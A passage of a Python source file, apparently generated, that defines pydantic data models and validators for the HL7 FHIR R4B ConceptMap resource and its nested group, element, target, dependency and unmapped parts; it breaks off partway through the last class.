+{"seq_id":"84704243","text":"# -*- coding: utf-8 -*-\n\"\"\"\nProfile: http://hl7.org/fhir/StructureDefinition/ConceptMap\nRelease: R4B\nVersion: 4.3.0\nBuild ID: c475c22\nLast updated: 2022-05-28T12:47:40.239+10:00\n\"\"\"\nimport typing\n\nfrom pydantic import Field, root_validator\nfrom pydantic.error_wrappers import ErrorWrapper, ValidationError\nfrom pydantic.errors import MissingError, NoneIsNotAllowedError\n\nfrom . import backboneelement, domainresource, fhirtypes\n\n\nclass ConceptMap(domainresource.DomainResource):\n \"\"\"Disclaimer: Any field name ends with ``__ext`` doesn't part of\n Resource StructureDefinition, instead used to enable Extensibility feature\n for FHIR Primitive Data Types.\n\n A map from one set of concepts to one or more other concepts.\n A statement of relationships from one set of concepts to one or more other\n concepts - either concepts in code systems, or data element/data element\n concepts, or classes in class models.\n \"\"\"\n\n resource_type = Field(\"ConceptMap\", const=True)\n\n contact: typing.List[fhirtypes.ContactDetailType] = Field(\n None,\n alias=\"contact\",\n title=\"Contact details for the publisher\",\n description=(\n \"Contact details to assist a user in finding and communicating with the\"\n \" publisher.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n copyright: fhirtypes.Markdown = Field(\n None,\n alias=\"copyright\",\n title=\"Use and/or publishing restrictions\",\n description=(\n \"A copyright statement relating to the concept map and/or its contents.\"\n \" Copyright statements are generally legal restrictions on the use and \"\n \"publishing of the concept map.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n copyright__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_copyright\", title=\"Extension field for ``copyright``.\"\n )\n\n date: fhirtypes.DateTime = Field(\n None,\n alias=\"date\",\n title=\"Date last changed\",\n description=(\n \"The date (and optionally time) when the concept map was published. \"\n \"The date must change when the business version changes and it must \"\n \"change if the status code changes. 
In addition, it should change when \"\n \"the substantive content of the concept map changes.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n date__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_date\", title=\"Extension field for ``date``.\"\n )\n\n description: fhirtypes.Markdown = Field(\n None,\n alias=\"description\",\n title=\"Natural language description of the concept map\",\n description=(\n \"A free text natural language description of the concept map from a \"\n \"consumer's perspective.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_description\", title=\"Extension field for ``description``.\"\n )\n\n experimental: bool = Field(\n None,\n alias=\"experimental\",\n title=\"For testing purposes, not real usage\",\n description=(\n \"A Boolean value to indicate that this concept map is authored for \"\n \"testing purposes (or education/evaluation/marketing) and is not \"\n \"intended to be used for genuine usage.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n experimental__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_experimental\", title=\"Extension field for ``experimental``.\"\n )\n\n group: typing.List[fhirtypes.ConceptMapGroupType] = Field(\n None,\n alias=\"group\",\n title=\"Same source and target systems\",\n description=\"A group of mappings that all have the same source and target system.\",\n # if property is element of this resource.\n element_property=True,\n )\n\n identifier: fhirtypes.IdentifierType = Field(\n None,\n alias=\"identifier\",\n title=\"Additional identifier for the concept map\",\n description=(\n \"A formal identifier that is used to identify this concept map when it \"\n \"is represented in other formats, or referenced in a specification, \"\n \"model, design or an instance.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n jurisdiction: typing.List[fhirtypes.CodeableConceptType] = Field(\n None,\n alias=\"jurisdiction\",\n title=\"Intended jurisdiction for concept map (if applicable)\",\n description=(\n \"A legal or geographic region in which the concept map is intended to \"\n \"be used.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n name: fhirtypes.String = Field(\n None,\n alias=\"name\",\n title=\"Name for this concept map (computer friendly)\",\n description=(\n \"A natural language name identifying the concept map. 
This name should \"\n \"be usable as an identifier for the module by machine processing \"\n \"applications such as code generation.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_name\", title=\"Extension field for ``name``.\"\n )\n\n publisher: fhirtypes.String = Field(\n None,\n alias=\"publisher\",\n title=\"Name of the publisher (organization or individual)\",\n description=(\n \"The name of the organization or individual that published the concept \"\n \"map.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n publisher__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_publisher\", title=\"Extension field for ``publisher``.\"\n )\n\n purpose: fhirtypes.Markdown = Field(\n None,\n alias=\"purpose\",\n title=\"Why this concept map is defined\",\n description=(\n \"Explanation of why this concept map is needed and why it has been \"\n \"designed as it has.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n purpose__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_purpose\", title=\"Extension field for ``purpose``.\"\n )\n\n sourceCanonical: fhirtypes.Canonical = Field(\n None,\n alias=\"sourceCanonical\",\n title=\"The source value set that contains the concepts that are being mapped\",\n description=(\n \"Identifier for the source value set that contains the concepts that \"\n \"are being mapped and provides context for the mappings.\"\n ),\n # if property is element of this resource.\n element_property=True,\n # Choice of Data Types. i.e source[x]\n one_of_many=\"source\",\n one_of_many_required=False,\n # note: Listed Resource Type(s) should be allowed as Reference.\n enum_reference_types=[\"ValueSet\"],\n )\n sourceCanonical__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_sourceCanonical\", title=\"Extension field for ``sourceCanonical``.\"\n )\n\n sourceUri: fhirtypes.Uri = Field(\n None,\n alias=\"sourceUri\",\n title=\"The source value set that contains the concepts that are being mapped\",\n description=(\n \"Identifier for the source value set that contains the concepts that \"\n \"are being mapped and provides context for the mappings.\"\n ),\n # if property is element of this resource.\n element_property=True,\n # Choice of Data Types. i.e source[x]\n one_of_many=\"source\",\n one_of_many_required=False,\n )\n sourceUri__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_sourceUri\", title=\"Extension field for ``sourceUri``.\"\n )\n\n status: fhirtypes.Code = Field(\n None,\n alias=\"status\",\n title=\"draft | active | retired | unknown\",\n description=(\n \"The status of this concept map. Enables tracking the life-cycle of the\"\n \" content.\"\n ),\n # if property is element of this resource.\n element_property=True,\n element_required=True,\n # note: Enum values can be used in validation,\n # but use in your own responsibilities, read official FHIR documentation.\n enum_values=[\"draft\", \"active\", \"retired\", \"unknown\"],\n )\n status__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_status\", title=\"Extension field for ``status``.\"\n )\n\n targetCanonical: fhirtypes.Canonical = Field(\n None,\n alias=\"targetCanonical\",\n title=\"The target value set which provides context for the mappings\",\n description=(\n \"The target value set provides context for the mappings. 
Note that the \"\n \"mapping is made between concepts, not between value sets, but the \"\n \"value set provides important context about how the concept mapping \"\n \"choices are made.\"\n ),\n # if property is element of this resource.\n element_property=True,\n # Choice of Data Types. i.e target[x]\n one_of_many=\"target\",\n one_of_many_required=False,\n # note: Listed Resource Type(s) should be allowed as Reference.\n enum_reference_types=[\"ValueSet\"],\n )\n targetCanonical__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_targetCanonical\", title=\"Extension field for ``targetCanonical``.\"\n )\n\n targetUri: fhirtypes.Uri = Field(\n None,\n alias=\"targetUri\",\n title=\"The target value set which provides context for the mappings\",\n description=(\n \"The target value set provides context for the mappings. Note that the \"\n \"mapping is made between concepts, not between value sets, but the \"\n \"value set provides important context about how the concept mapping \"\n \"choices are made.\"\n ),\n # if property is element of this resource.\n element_property=True,\n # Choice of Data Types. i.e target[x]\n one_of_many=\"target\",\n one_of_many_required=False,\n )\n targetUri__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_targetUri\", title=\"Extension field for ``targetUri``.\"\n )\n\n title: fhirtypes.String = Field(\n None,\n alias=\"title\",\n title=\"Name for this concept map (human friendly)\",\n description=\"A short, descriptive, user-friendly title for the concept map.\",\n # if property is element of this resource.\n element_property=True,\n )\n title__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_title\", title=\"Extension field for ``title``.\"\n )\n\n url: fhirtypes.Uri = Field(\n None,\n alias=\"url\",\n title=(\n \"Canonical identifier for this concept map, represented as a URI \"\n \"(globally unique)\"\n ),\n description=(\n \"An absolute URI that is used to identify this concept map when it is \"\n \"referenced in a specification, model, design or an instance; also \"\n \"called its canonical identifier. This SHOULD be globally unique and \"\n \"SHOULD be a literal address at which at which an authoritative \"\n \"instance of this concept map is (or will be) published. This URL can \"\n \"be the target of a canonical reference. It SHALL remain the same when \"\n \"the concept map is stored on different servers.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n url__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_url\", title=\"Extension field for ``url``.\"\n )\n\n useContext: typing.List[fhirtypes.UsageContextType] = Field(\n None,\n alias=\"useContext\",\n title=\"The context that the content is intended to support\",\n description=(\n \"The content was developed with a focus and intent of supporting the \"\n \"contexts that are listed. These contexts may be general categories \"\n \"(gender, age, ...) or may be references to specific programs \"\n \"(insurance plans, studies, ...) and may be used to assist with \"\n \"indexing and searching for appropriate concept map instances.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n version: fhirtypes.String = Field(\n None,\n alias=\"version\",\n title=\"Business version of the concept map\",\n description=(\n \"The identifier that is used to identify this version of the concept \"\n \"map when it is referenced in a specification, model, design or \"\n \"instance. 
This is an arbitrary value managed by the concept map author\"\n \" and is not expected to be globally unique. For example, it might be a\"\n \" timestamp (e.g. yyyymmdd) if a managed version is not available. \"\n \"There is also no expectation that versions can be placed in a \"\n \"lexicographical sequence.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n version__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_version\", title=\"Extension field for ``version``.\"\n )\n\n @classmethod\n def elements_sequence(cls):\n \"\"\"returning all elements names from\n ``ConceptMap`` according specification,\n with preserving original sequence order.\n \"\"\"\n return [\n \"id\",\n \"meta\",\n \"implicitRules\",\n \"language\",\n \"text\",\n \"contained\",\n \"extension\",\n \"modifierExtension\",\n \"url\",\n \"identifier\",\n \"version\",\n \"name\",\n \"title\",\n \"status\",\n \"experimental\",\n \"date\",\n \"publisher\",\n \"contact\",\n \"description\",\n \"useContext\",\n \"jurisdiction\",\n \"purpose\",\n \"copyright\",\n \"sourceUri\",\n \"sourceCanonical\",\n \"targetUri\",\n \"targetCanonical\",\n \"group\",\n ]\n\n @root_validator(pre=True, allow_reuse=True)\n def validate_required_primitive_elements_1181(\n cls, values: typing.Dict[str, typing.Any]\n ) -> typing.Dict[str, typing.Any]:\n \"\"\"https://www.hl7.org/fhir/extensibility.html#Special-Case\n In some cases, implementers might find that they do not have appropriate data for\n an element with minimum cardinality = 1. In this case, the element must be present,\n but unless the resource or a profile on it has made the actual value of the primitive\n data type mandatory, it is possible to provide an extension that explains why\n the primitive value is not present.\n \"\"\"\n required_fields = [(\"status\", \"status__ext\")]\n _missing = object()\n\n def _fallback():\n return \"\"\n\n errors: typing.List[\"ErrorWrapper\"] = []\n for name, ext in required_fields:\n field = cls.__fields__[name]\n ext_field = cls.__fields__[ext]\n value = values.get(field.alias, _missing)\n if value not in (_missing, None):\n continue\n ext_value = values.get(ext_field.alias, _missing)\n missing_ext = True\n if ext_value not in (_missing, None):\n if isinstance(ext_value, dict):\n missing_ext = len(ext_value.get(\"extension\", [])) == 0\n elif (\n getattr(ext_value.__class__, \"get_resource_type\", _fallback)()\n == \"FHIRPrimitiveExtension\"\n ):\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n else:\n validate_pass = True\n for validator in ext_field.type_.__get_validators__():\n try:\n ext_value = validator(v=ext_value)\n except ValidationError as exc:\n errors.append(ErrorWrapper(exc, loc=ext_field.alias))\n validate_pass = False\n if not validate_pass:\n continue\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n if missing_ext:\n if value is _missing:\n errors.append(ErrorWrapper(MissingError(), loc=field.alias))\n else:\n errors.append(\n ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)\n )\n if len(errors) > 0:\n raise ValidationError(errors, cls) # type: ignore\n\n return values\n\n @root_validator(pre=True, allow_reuse=True)\n def validate_one_of_many_1181(\n cls, values: typing.Dict[str, typing.Any]\n ) -> typing.Dict[str, typing.Any]:\n \"\"\"https://www.hl7.org/fhir/formats.html#choice\n A few elements have a choice of more than one data type for their content.\n All such elements have a name that takes the form 
nnn[x].\n The \"nnn\" part of the name is constant, and the \"[x]\" is replaced with\n the title-cased name of the type that is actually used.\n The table view shows each of these names explicitly.\n\n Elements that have a choice of data type cannot repeat - they must have a\n maximum cardinality of 1. When constructing an instance of an element with a\n choice of types, the authoring system must create a single element with a\n data type chosen from among the list of permitted data types.\n \"\"\"\n one_of_many_fields = {\n \"source\": [\"sourceCanonical\", \"sourceUri\"],\n \"target\": [\"targetCanonical\", \"targetUri\"],\n }\n for prefix, fields in one_of_many_fields.items():\n assert cls.__fields__[fields[0]].field_info.extra[\"one_of_many\"] == prefix\n required = (\n cls.__fields__[fields[0]].field_info.extra[\"one_of_many_required\"]\n is True\n )\n found = False\n for field in fields:\n if field in values and values[field] is not None:\n if found is True:\n raise ValueError(\n \"Any of one field value is expected from \"\n f\"this list {fields}, but got multiple!\"\n )\n else:\n found = True\n if required is True and found is False:\n raise ValueError(f\"Expect any of field value from this list {fields}.\")\n\n return values\n\n\nclass ConceptMapGroup(backboneelement.BackboneElement):\n \"\"\"Disclaimer: Any field name ends with ``__ext`` doesn't part of\n Resource StructureDefinition, instead used to enable Extensibility feature\n for FHIR Primitive Data Types.\n\n Same source and target systems.\n A group of mappings that all have the same source and target system.\n \"\"\"\n\n resource_type = Field(\"ConceptMapGroup\", const=True)\n\n element: typing.List[fhirtypes.ConceptMapGroupElementType] = Field(\n ...,\n alias=\"element\",\n title=\"Mappings for a concept from the source set\",\n description=(\n \"Mappings for an individual concept in the source to one or more \"\n \"concepts in the target.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n source: fhirtypes.Uri = Field(\n None,\n alias=\"source\",\n title=\"Source system where concepts to be mapped are defined\",\n description=(\n \"An absolute URI that identifies the source system where the concepts \"\n \"to be mapped are defined.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n source__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_source\", title=\"Extension field for ``source``.\"\n )\n\n sourceVersion: fhirtypes.String = Field(\n None,\n alias=\"sourceVersion\",\n title=\"Specific version of the code system\",\n description=(\n \"The specific version of the code system, as determined by the code \"\n \"system authority.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n sourceVersion__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_sourceVersion\", title=\"Extension field for ``sourceVersion``.\"\n )\n\n target: fhirtypes.Uri = Field(\n None,\n alias=\"target\",\n title=\"Target system that the concepts are to be mapped to\",\n description=(\n \"An absolute URI that identifies the target system that the concepts \"\n \"will be mapped to.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n target__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_target\", title=\"Extension field for ``target``.\"\n )\n\n targetVersion: fhirtypes.String = Field(\n None,\n alias=\"targetVersion\",\n title=\"Specific version of the code system\",\n 
description=(\n \"The specific version of the code system, as determined by the code \"\n \"system authority.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n targetVersion__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_targetVersion\", title=\"Extension field for ``targetVersion``.\"\n )\n\n unmapped: fhirtypes.ConceptMapGroupUnmappedType = Field(\n None,\n alias=\"unmapped\",\n title=\"What to do when there is no mapping for the source concept\",\n description=(\n 'What to do when there is no mapping for the source concept. \"Unmapped\"'\n \" does not include codes that are unmatched, and the unmapped element \"\n \"is ignored in a code is specified to have equivalence = unmatched.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n @classmethod\n def elements_sequence(cls):\n \"\"\"returning all elements names from\n ``ConceptMapGroup`` according specification,\n with preserving original sequence order.\n \"\"\"\n return [\n \"id\",\n \"extension\",\n \"modifierExtension\",\n \"source\",\n \"sourceVersion\",\n \"target\",\n \"targetVersion\",\n \"element\",\n \"unmapped\",\n ]\n\n\nclass ConceptMapGroupElement(backboneelement.BackboneElement):\n \"\"\"Disclaimer: Any field name ends with ``__ext`` doesn't part of\n Resource StructureDefinition, instead used to enable Extensibility feature\n for FHIR Primitive Data Types.\n\n Mappings for a concept from the source set.\n Mappings for an individual concept in the source to one or more concepts in\n the target.\n \"\"\"\n\n resource_type = Field(\"ConceptMapGroupElement\", const=True)\n\n code: fhirtypes.Code = Field(\n None,\n alias=\"code\",\n title=\"Identifies element being mapped\",\n description=\"Identity (code or path) or the element/item being mapped.\",\n # if property is element of this resource.\n element_property=True,\n )\n code__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_code\", title=\"Extension field for ``code``.\"\n )\n\n display: fhirtypes.String = Field(\n None,\n alias=\"display\",\n title=\"Display for the code\",\n description=(\n \"The display for the code. 
The display is only provided to help editors\"\n \" when editing the concept map.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n display__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_display\", title=\"Extension field for ``display``.\"\n )\n\n target: typing.List[fhirtypes.ConceptMapGroupElementTargetType] = Field(\n None,\n alias=\"target\",\n title=\"Concept in target system for element\",\n description=\"A concept from the target value set that this concept maps to.\",\n # if property is element of this resource.\n element_property=True,\n )\n\n @classmethod\n def elements_sequence(cls):\n \"\"\"returning all elements names from\n ``ConceptMapGroupElement`` according specification,\n with preserving original sequence order.\n \"\"\"\n return [\"id\", \"extension\", \"modifierExtension\", \"code\", \"display\", \"target\"]\n\n\nclass ConceptMapGroupElementTarget(backboneelement.BackboneElement):\n \"\"\"Disclaimer: Any field name ends with ``__ext`` doesn't part of\n Resource StructureDefinition, instead used to enable Extensibility feature\n for FHIR Primitive Data Types.\n\n Concept in target system for element.\n A concept from the target value set that this concept maps to.\n \"\"\"\n\n resource_type = Field(\"ConceptMapGroupElementTarget\", const=True)\n\n code: fhirtypes.Code = Field(\n None,\n alias=\"code\",\n title=\"Code that identifies the target element\",\n description=\"Identity (code or path) or the element/item that the map refers to.\",\n # if property is element of this resource.\n element_property=True,\n )\n code__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_code\", title=\"Extension field for ``code``.\"\n )\n\n comment: fhirtypes.String = Field(\n None,\n alias=\"comment\",\n title=\"Description of status/issues in mapping\",\n description=(\n \"A description of status/issues in mapping that conveys additional \"\n \"information not represented in the structured data.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n comment__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_comment\", title=\"Extension field for ``comment``.\"\n )\n\n dependsOn: typing.List[fhirtypes.ConceptMapGroupElementTargetDependsOnType] = Field(\n None,\n alias=\"dependsOn\",\n title=\"Other elements required for this mapping (from context)\",\n description=(\n \"A set of additional dependencies for this mapping to hold. This \"\n \"mapping is only applicable if the specified element can be resolved, \"\n \"and it has the specified value.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n display: fhirtypes.String = Field(\n None,\n alias=\"display\",\n title=\"Display for the code\",\n description=(\n \"The display for the code. The display is only provided to help editors\"\n \" when editing the concept map.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n display__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_display\", title=\"Extension field for ``display``.\"\n )\n\n equivalence: fhirtypes.Code = Field(\n None,\n alias=\"equivalence\",\n title=(\n \"relatedto | equivalent | equal | wider | subsumes | narrower | \"\n \"specializes | inexact | unmatched | disjoint\"\n ),\n description=(\n \"The equivalence between the source and target concepts (counting for \"\n \"the dependencies and products). The equivalence is read from target to\"\n \" source (e.g. 
the target is 'wider' than the source).\"\n ),\n # if property is element of this resource.\n element_property=True,\n element_required=True,\n # note: Enum values can be used in validation,\n # but use in your own responsibilities, read official FHIR documentation.\n enum_values=[\n \"relatedto\",\n \"equivalent\",\n \"equal\",\n \"wider\",\n \"subsumes\",\n \"narrower\",\n \"specializes\",\n \"inexact\",\n \"unmatched\",\n \"disjoint\",\n ],\n )\n equivalence__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_equivalence\", title=\"Extension field for ``equivalence``.\"\n )\n\n product: typing.List[fhirtypes.ConceptMapGroupElementTargetDependsOnType] = Field(\n None,\n alias=\"product\",\n title=\"Other concepts that this mapping also produces\",\n description=(\n \"A set of additional outcomes from this mapping to other elements. To \"\n \"properly execute this mapping, the specified element must be mapped to\"\n \" some data element or source that is in context. The mapping may still\"\n \" be useful without a place for the additional data elements, but the \"\n \"equivalence cannot be relied on.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n @classmethod\n def elements_sequence(cls):\n \"\"\"returning all elements names from\n ``ConceptMapGroupElementTarget`` according specification,\n with preserving original sequence order.\n \"\"\"\n return [\n \"id\",\n \"extension\",\n \"modifierExtension\",\n \"code\",\n \"display\",\n \"equivalence\",\n \"comment\",\n \"dependsOn\",\n \"product\",\n ]\n\n @root_validator(pre=True, allow_reuse=True)\n def validate_required_primitive_elements_3039(\n cls, values: typing.Dict[str, typing.Any]\n ) -> typing.Dict[str, typing.Any]:\n \"\"\"https://www.hl7.org/fhir/extensibility.html#Special-Case\n In some cases, implementers might find that they do not have appropriate data for\n an element with minimum cardinality = 1. 
In this case, the element must be present,\n but unless the resource or a profile on it has made the actual value of the primitive\n data type mandatory, it is possible to provide an extension that explains why\n the primitive value is not present.\n \"\"\"\n required_fields = [(\"equivalence\", \"equivalence__ext\")]\n _missing = object()\n\n def _fallback():\n return \"\"\n\n errors: typing.List[\"ErrorWrapper\"] = []\n for name, ext in required_fields:\n field = cls.__fields__[name]\n ext_field = cls.__fields__[ext]\n value = values.get(field.alias, _missing)\n if value not in (_missing, None):\n continue\n ext_value = values.get(ext_field.alias, _missing)\n missing_ext = True\n if ext_value not in (_missing, None):\n if isinstance(ext_value, dict):\n missing_ext = len(ext_value.get(\"extension\", [])) == 0\n elif (\n getattr(ext_value.__class__, \"get_resource_type\", _fallback)()\n == \"FHIRPrimitiveExtension\"\n ):\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n else:\n validate_pass = True\n for validator in ext_field.type_.__get_validators__():\n try:\n ext_value = validator(v=ext_value)\n except ValidationError as exc:\n errors.append(ErrorWrapper(exc, loc=ext_field.alias))\n validate_pass = False\n if not validate_pass:\n continue\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n if missing_ext:\n if value is _missing:\n errors.append(ErrorWrapper(MissingError(), loc=field.alias))\n else:\n errors.append(\n ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)\n )\n if len(errors) > 0:\n raise ValidationError(errors, cls) # type: ignore\n\n return values\n\n\nclass ConceptMapGroupElementTargetDependsOn(backboneelement.BackboneElement):\n \"\"\"Disclaimer: Any field name ends with ``__ext`` doesn't part of\n Resource StructureDefinition, instead used to enable Extensibility feature\n for FHIR Primitive Data Types.\n\n Other elements required for this mapping (from context).\n A set of additional dependencies for this mapping to hold. This mapping is\n only applicable if the specified element can be resolved, and it has the\n specified value.\n \"\"\"\n\n resource_type = Field(\"ConceptMapGroupElementTargetDependsOn\", const=True)\n\n display: fhirtypes.String = Field(\n None,\n alias=\"display\",\n title=\"Display for the code (if value is a code)\",\n description=(\n \"The display for the code. The display is only provided to help editors\"\n \" when editing the concept map.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n display__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_display\", title=\"Extension field for ``display``.\"\n )\n\n property: fhirtypes.Uri = Field(\n None,\n alias=\"property\",\n title=\"Reference to property mapping depends on\",\n description=(\n \"A reference to an element that holds a coded value that corresponds to\"\n \" a code system property. 
The idea is that the information model \"\n \"carries an element somewhere that is labeled to correspond with a code\"\n \" system property.\"\n ),\n # if property is element of this resource.\n element_property=True,\n element_required=True,\n )\n property__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_property\", title=\"Extension field for ``property``.\"\n )\n\n system: fhirtypes.Canonical = Field(\n None,\n alias=\"system\",\n title=\"Code System (if necessary)\",\n description=(\n \"An absolute URI that identifies the code system of the dependency code\"\n \" (if the source/dependency is a value set that crosses code systems).\"\n ),\n # if property is element of this resource.\n element_property=True,\n # note: Listed Resource Type(s) should be allowed as Reference.\n enum_reference_types=[\"CodeSystem\"],\n )\n system__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_system\", title=\"Extension field for ``system``.\"\n )\n\n value: fhirtypes.String = Field(\n None,\n alias=\"value\",\n title=\"Value of the referenced element\",\n description=(\n \"Identity (code or path) or the element/item/ValueSet/text that the map\"\n \" depends on / refers to.\"\n ),\n # if property is element of this resource.\n element_property=True,\n element_required=True,\n )\n value__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_value\", title=\"Extension field for ``value``.\"\n )\n\n @classmethod\n def elements_sequence(cls):\n \"\"\"returning all elements names from\n ``ConceptMapGroupElementTargetDependsOn`` according specification,\n with preserving original sequence order.\n \"\"\"\n return [\n \"id\",\n \"extension\",\n \"modifierExtension\",\n \"property\",\n \"system\",\n \"value\",\n \"display\",\n ]\n\n @root_validator(pre=True, allow_reuse=True)\n def validate_required_primitive_elements_3929(\n cls, values: typing.Dict[str, typing.Any]\n ) -> typing.Dict[str, typing.Any]:\n \"\"\"https://www.hl7.org/fhir/extensibility.html#Special-Case\n In some cases, implementers might find that they do not have appropriate data for\n an element with minimum cardinality = 1. 
In this case, the element must be present,\n but unless the resource or a profile on it has made the actual value of the primitive\n data type mandatory, it is possible to provide an extension that explains why\n the primitive value is not present.\n \"\"\"\n required_fields = [(\"property\", \"property__ext\"), (\"value\", \"value__ext\")]\n _missing = object()\n\n def _fallback():\n return \"\"\n\n errors: typing.List[\"ErrorWrapper\"] = []\n for name, ext in required_fields:\n field = cls.__fields__[name]\n ext_field = cls.__fields__[ext]\n value = values.get(field.alias, _missing)\n if value not in (_missing, None):\n continue\n ext_value = values.get(ext_field.alias, _missing)\n missing_ext = True\n if ext_value not in (_missing, None):\n if isinstance(ext_value, dict):\n missing_ext = len(ext_value.get(\"extension\", [])) == 0\n elif (\n getattr(ext_value.__class__, \"get_resource_type\", _fallback)()\n == \"FHIRPrimitiveExtension\"\n ):\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n else:\n validate_pass = True\n for validator in ext_field.type_.__get_validators__():\n try:\n ext_value = validator(v=ext_value)\n except ValidationError as exc:\n errors.append(ErrorWrapper(exc, loc=ext_field.alias))\n validate_pass = False\n if not validate_pass:\n continue\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n if missing_ext:\n if value is _missing:\n errors.append(ErrorWrapper(MissingError(), loc=field.alias))\n else:\n errors.append(\n ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)\n )\n if len(errors) > 0:\n raise ValidationError(errors, cls) # type: ignore\n\n return values\n\n\nclass ConceptMapGroupUnmapped(backboneelement.BackboneElement):\n \"\"\"Disclaimer: Any field name ends with ``__ext`` doesn't part of\n Resource StructureDefinition, instead used to enable Extensibility feature\n for FHIR Primitive Data Types.\n\n What to do when there is no mapping for the source concept.\n What to do when there is no mapping for the source concept. \"Unmapped\" does\n not include codes that are unmatched, and the unmapped element is ignored\n in a code is specified to have equivalence = unmatched.\n \"\"\"\n\n resource_type = Field(\"ConceptMapGroupUnmapped\", const=True)\n\n code: fhirtypes.Code = Field(\n None,\n alias=\"code\",\n title=\"Fixed code when mode = fixed\",\n description=(\n \"The fixed code to use when the mode = 'fixed' - all unmapped codes \"\n \"are mapped to a single fixed code.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n code__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_code\", title=\"Extension field for ``code``.\"\n )\n\n display: fhirtypes.String = Field(\n None,\n alias=\"display\",\n title=\"Display for the code\",\n description=(\n \"The display for the code. The display is only provided to help editors\"\n \" when editing the concept map.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n display__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_display\", title=\"Extension field for ``display``.\"\n )\n\n mode: fhirtypes.Code = Field(\n None,\n alias=\"mode\",\n title=\"provided | fixed | other-map\",\n description=(\n \"Defines which action to take if there is no match for the source \"\n \"concept in the target system designated for the group. 
One of 3 \"\n \"actions are possible: use the unmapped code (this is useful when doing\"\n \" a mapping between versions, and only a few codes have changed), use a\"\n \" fixed code (a default code), or alternatively, a reference to a \"\n \"different concept map can be provided (by canonical URL).\"\n ),\n # if property is element of this resource.\n element_property=True,\n element_required=True,\n # note: Enum values can be used in validation,\n # but use in your own responsibilities, read official FHIR documentation.\n enum_values=[\"provided\", \"fixed\", \"other-map\"],\n )\n mode__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_mode\", title=\"Extension field for ``mode``.\"\n )\n\n url: fhirtypes.Canonical = Field(\n None,\n alias=\"url\",\n title=(\n \"canonical reference to an additional ConceptMap to use for mapping if \"\n \"the source concept is unmapped\"\n ),\n description=(\n \"The canonical reference to an additional ConceptMap resource instance \"\n \"to use for mapping if this ConceptMap resource contains no matching \"\n \"mapping for the source concept.\"\n ),\n # if property is element of this resource.\n element_property=True,\n # note: Listed Resource Type(s) should be allowed as Reference.\n 